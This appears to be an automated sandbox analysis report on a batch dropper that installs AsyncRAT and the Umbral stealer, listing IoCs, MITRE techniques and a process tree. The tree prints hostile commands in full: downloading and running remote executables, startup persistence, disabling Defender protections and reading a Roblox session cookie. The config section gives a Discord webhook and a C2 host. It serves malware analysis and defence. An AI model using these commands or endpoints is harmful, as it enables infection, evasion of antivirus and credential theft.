asyncrat | 5fbc4bddd26765b3c6f1b0ab2af444bf72f6e589ac6d289db2e4b7c8b195874e

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 12:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

1KB
MD5

de5a66871a7e14fe1c7d56db9aa2e8e5
SHA1

c119aea04d27dd918b9aa3b734271707098cd022
SHA256

5fbc4bddd26765b3c6f1b0ab2af444bf72f6e589ac6d289db2e4b7c8b195874e
SHA512

24a452d84c478d733c6d0e23d62dfca3e629720542cae36164522bfe631a05d53bafcb91c3f70ccea669c662a5fcb0b728cc56305486c9358e6c60123044e5a5

Score

10^/10

asyncrat umbral default discovery execution rat spyware stealer

Malware Config

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1310577588602667038/v6do4PoA82VdH0edzJ4iW13aksBJ6rEVHVHVO7Qj6EGYvvmguDUqbAezb57n5M3uYTWB

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023b70-31.dat	family_umbral
behavioral1/memory/4820-36-0x0000021421070000-0x00000214210B0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000c000000023b73-127.dat	family_asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	3980	powershell.exe
18	3980	powershell.exe
29	3856	powershell.exe
31	3856	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3412	powershell.exe
2528	powershell.exe
4656	powershell.exe
3856	powershell.exe
3980	powershell.exe
3100	powershell.exe
3384	powershell.exe
1808	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	output.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Loader.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4820	output.exe
3580	Loader.exe
4884	WINDOWS.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3640	cmd.exe
2892	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
640	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1160	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2892	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3252	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3980	powershell.exe
3980	powershell.exe
3412	powershell.exe
3412	powershell.exe
3856	powershell.exe
3856	powershell.exe
4820	output.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe
2528	powershell.exe
2528	powershell.exe
1808	powershell.exe
1808	powershell.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe
3580	Loader.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	4820	output.exe
Token: SeIncreaseQuotaPrivilege	2860	wmic.exe
Token: SeSecurityPrivilege	2860	wmic.exe
Token: SeTakeOwnershipPrivilege	2860	wmic.exe
Token: SeLoadDriverPrivilege	2860	wmic.exe
Token: SeSystemProfilePrivilege	2860	wmic.exe
Token: SeSystemtimePrivilege	2860	wmic.exe
Token: SeProfSingleProcessPrivilege	2860	wmic.exe
Token: SeIncBasePriorityPrivilege	2860	wmic.exe
Token: SeCreatePagefilePrivilege	2860	wmic.exe
Token: SeBackupPrivilege	2860	wmic.exe
Token: SeRestorePrivilege	2860	wmic.exe
Token: SeShutdownPrivilege	2860	wmic.exe
Token: SeDebugPrivilege	2860	wmic.exe
Token: SeSystemEnvironmentPrivilege	2860	wmic.exe
Token: SeRemoteShutdownPrivilege	2860	wmic.exe
Token: SeUndockPrivilege	2860	wmic.exe
Token: SeManageVolumePrivilege	2860	wmic.exe
Token: 33	2860	wmic.exe
Token: 34	2860	wmic.exe
Token: 35	2860	wmic.exe
Token: 36	2860	wmic.exe
Token: SeIncreaseQuotaPrivilege	2860	wmic.exe
Token: SeSecurityPrivilege	2860	wmic.exe
Token: SeTakeOwnershipPrivilege	2860	wmic.exe
Token: SeLoadDriverPrivilege	2860	wmic.exe
Token: SeSystemProfilePrivilege	2860	wmic.exe
Token: SeSystemtimePrivilege	2860	wmic.exe
Token: SeProfSingleProcessPrivilege	2860	wmic.exe
Token: SeIncBasePriorityPrivilege	2860	wmic.exe
Token: SeCreatePagefilePrivilege	2860	wmic.exe
Token: SeBackupPrivilege	2860	wmic.exe
Token: SeRestorePrivilege	2860	wmic.exe
Token: SeShutdownPrivilege	2860	wmic.exe
Token: SeDebugPrivilege	2860	wmic.exe
Token: SeSystemEnvironmentPrivilege	2860	wmic.exe
Token: SeRemoteShutdownPrivilege	2860	wmic.exe
Token: SeUndockPrivilege	2860	wmic.exe
Token: SeManageVolumePrivilege	2860	wmic.exe
Token: 33	2860	wmic.exe
Token: 34	2860	wmic.exe
Token: 35	2860	wmic.exe
Token: 36	2860	wmic.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeIncreaseQuotaPrivilege	3980	wmic.exe
Token: SeSecurityPrivilege	3980	wmic.exe
Token: SeTakeOwnershipPrivilege	3980	wmic.exe
Token: SeLoadDriverPrivilege	3980	wmic.exe
Token: SeSystemProfilePrivilege	3980	wmic.exe
Token: SeSystemtimePrivilege	3980	wmic.exe
Token: SeProfSingleProcessPrivilege	3980	wmic.exe
Token: SeIncBasePriorityPrivilege	3980	wmic.exe
Token: SeCreatePagefilePrivilege	3980	wmic.exe
Token: SeBackupPrivilege	3980	wmic.exe
Token: SeRestorePrivilege	3980	wmic.exe
Token: SeShutdownPrivilege	3980	wmic.exe
Token: SeDebugPrivilege	3980	wmic.exe
Token: SeSystemEnvironmentPrivilege	3980	wmic.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1200 wrote to memory of 3980	1200	cmd.exe	85
PID 1200 wrote to memory of 3980	1200	cmd.exe	85
PID 1200 wrote to memory of 3412	1200	cmd.exe	87
PID 1200 wrote to memory of 3412	1200	cmd.exe	87
PID 1200 wrote to memory of 4820	1200	cmd.exe	91
PID 1200 wrote to memory of 4820	1200	cmd.exe	91
PID 1200 wrote to memory of 3856	1200	cmd.exe	92
PID 1200 wrote to memory of 3856	1200	cmd.exe	92
PID 4820 wrote to memory of 2860	4820	output.exe	93
PID 4820 wrote to memory of 2860	4820	output.exe	93
PID 4820 wrote to memory of 3548	4820	output.exe	97
PID 4820 wrote to memory of 3548	4820	output.exe	97
PID 4820 wrote to memory of 4656	4820	output.exe	99
PID 4820 wrote to memory of 4656	4820	output.exe	99
PID 4820 wrote to memory of 3100	4820	output.exe	101
PID 4820 wrote to memory of 3100	4820	output.exe	101
PID 4820 wrote to memory of 3384	4820	output.exe	103
PID 4820 wrote to memory of 3384	4820	output.exe	103
PID 4820 wrote to memory of 2684	4820	output.exe	105
PID 4820 wrote to memory of 2684	4820	output.exe	105
PID 4820 wrote to memory of 3980	4820	output.exe	107
PID 4820 wrote to memory of 3980	4820	output.exe	107
PID 1200 wrote to memory of 2528	1200	cmd.exe	109
PID 1200 wrote to memory of 2528	1200	cmd.exe	109
PID 4820 wrote to memory of 904	4820	output.exe	110
PID 4820 wrote to memory of 904	4820	output.exe	110
PID 4820 wrote to memory of 4600	4820	output.exe	112
PID 4820 wrote to memory of 4600	4820	output.exe	112
PID 1200 wrote to memory of 3580	1200	cmd.exe	114
PID 1200 wrote to memory of 3580	1200	cmd.exe	114
PID 4820 wrote to memory of 1808	4820	output.exe	115
PID 4820 wrote to memory of 1808	4820	output.exe	115
PID 4820 wrote to memory of 1160	4820	output.exe	118
PID 4820 wrote to memory of 1160	4820	output.exe	118
PID 4820 wrote to memory of 3640	4820	output.exe	120
PID 4820 wrote to memory of 3640	4820	output.exe	120
PID 3640 wrote to memory of 2892	3640	cmd.exe	122
PID 3640 wrote to memory of 2892	3640	cmd.exe	122
PID 3580 wrote to memory of 1496	3580	Loader.exe	124
PID 3580 wrote to memory of 1496	3580	Loader.exe	124
PID 3580 wrote to memory of 1364	3580	Loader.exe	125
PID 3580 wrote to memory of 1364	3580	Loader.exe	125
PID 1364 wrote to memory of 640	1364	cmd.exe	129
PID 1364 wrote to memory of 640	1364	cmd.exe	129
PID 1364 wrote to memory of 4884	1364	cmd.exe	131
PID 1364 wrote to memory of 4884	1364	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3548	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/drf/releases/download/d/loader.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3412
- C:\Users\Admin\Desktop\output.exe
  C:\Users\Admin\Desktop\output.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Desktop\output.exe"
    3⤵
    - Views/modifies file attributes
    PID:3548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\output.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:904
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1808
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1160
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\output.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  PID:2528
- C:\Users\Admin\Desktop\Loader.exe
  C:\Users\Admin\Desktop\Loader.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3580
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
    3⤵
    PID:1496
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp96A2.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:640
  - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
      "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
      4⤵
      Executes dropped EXE
      PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9843d1de2b283224f4f4b8730ccc919f

SHA1
c053080262aef325e616687bf07993920503b62b

SHA256
409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1

SHA512
13d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59583cecd69c4401d92a7a17a16f194b

SHA1
6134e6c5ec66c755f1537dd984c66b293a207a46

SHA256
b3804330d219ae8b7ab3c7b36329b611f8e2c69e90fc86d77760b18d8428f6a6

SHA512
084a905d9543be8af45126ff5bd40db819f7cddee9db7618eb42c1229145b944ebd8c61696ac7ec617bd0e55152931bf964b6af01018e9bfce964b4e16121e32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3bc3d3f73fc81d9d1a8a4b17192aa35a

SHA1
d017d278395183edb0db4a301dacc57285d59a5c

SHA256
934a29e6c90140621824a91cd5d60a3c42a62207ad3fa4d6581ad2a6310cf614

SHA512
bf8c596f6c109bd6d932696c65c46f054033ffd3e39433ac69a3d6e91a0c28dfd73ca5a75a206ac1707a2b6cb57ba2b44ee8fadca2aad584439f280617d42134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
88eaf43aaf449b93e958cdac1f3f5242

SHA1
f6f6c5da1ad3da543ee53344debf0c21c604a6ab

SHA256
cb7108dd71f6af89f8661c5867cfec031c22e2e6cb09108db77286a249af79bb

SHA512
83c5474afd2c078284270ece6d757830340375d5b07031f1ffe3a214dd44f1319905f286cd46cdb90bd9e3738930a1e1c08677768e67c52799bbbe4e9ea5edcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1a58f982c18490e622e00d4eb75ace5a

SHA1
60c30527b74659ecf09089a5a7c02a1df9a71b65

SHA256
4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

SHA512
ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpzwken3.a0z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp96A2.tmp.bat

Filesize
151B

MD5
99625df8c3afe459a59017e813ff7629

SHA1
d05ad1ed0aff8a8b30281d81f4b3334b570acd43

SHA256
c141ea54f54e65c42a30c275951e19cc44d9a3bbe67eac5d52c37e6759e15e0b

SHA512
b3008ff305369a963e4ad5624f24a1769e45f0475b8a42112eb8b933c79a59d8a0d4e336ac1e77c7d7321e333de2573bff1ebc46490be7052bfae62d8850826c

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
227KB

MD5
96fc8b45a92d736087ac43746a142cf4

SHA1
35999912f4405f21f5068841581d1e1babf55a4b

SHA256
408dca374549b037529ff6b200f1fd3a9105d3f531805213e8750d3f3463ab1a

SHA512
b6938308458eab4412d130c1c0f5b5104f1e98ab714f659ee27d8d033dbbf9608c98f592bedcb6ff51f0f8f6a7fd4f6705783e0fbcdc900d743a8bf6416aaa16

Download Submit
memory/3412-18-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/3412-34-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/3412-30-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/3412-28-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/3580-131-0x0000000000650000-0x0000000000666000-memory.dmp

Filesize
88KB

Download
memory/3980-16-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/3980-10-0x0000018BE78D0000-0x0000018BE78F2000-memory.dmp

Filesize
136KB

Download
memory/3980-11-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/3980-0-0x00007FFBB9E73000-0x00007FFBB9E75000-memory.dmp

Filesize
8KB

Download
memory/3980-12-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

Filesize
10.8MB

Download
memory/4820-70-0x000002143B860000-0x000002143B8D6000-memory.dmp

Filesize
472KB

Download
memory/4820-110-0x0000021422DD0000-0x0000021422DE2000-memory.dmp

Filesize
72KB

Download
memory/4820-109-0x0000021421560000-0x000002142156A000-memory.dmp

Filesize
40KB

Download
memory/4820-72-0x0000021422D60000-0x0000021422D7E000-memory.dmp

Filesize
120KB

Download
memory/4820-71-0x0000021422D80000-0x0000021422DD0000-memory.dmp

Filesize
320KB

Download
memory/4820-36-0x0000021421070000-0x00000214210B0000-memory.dmp

Filesize
256KB

Download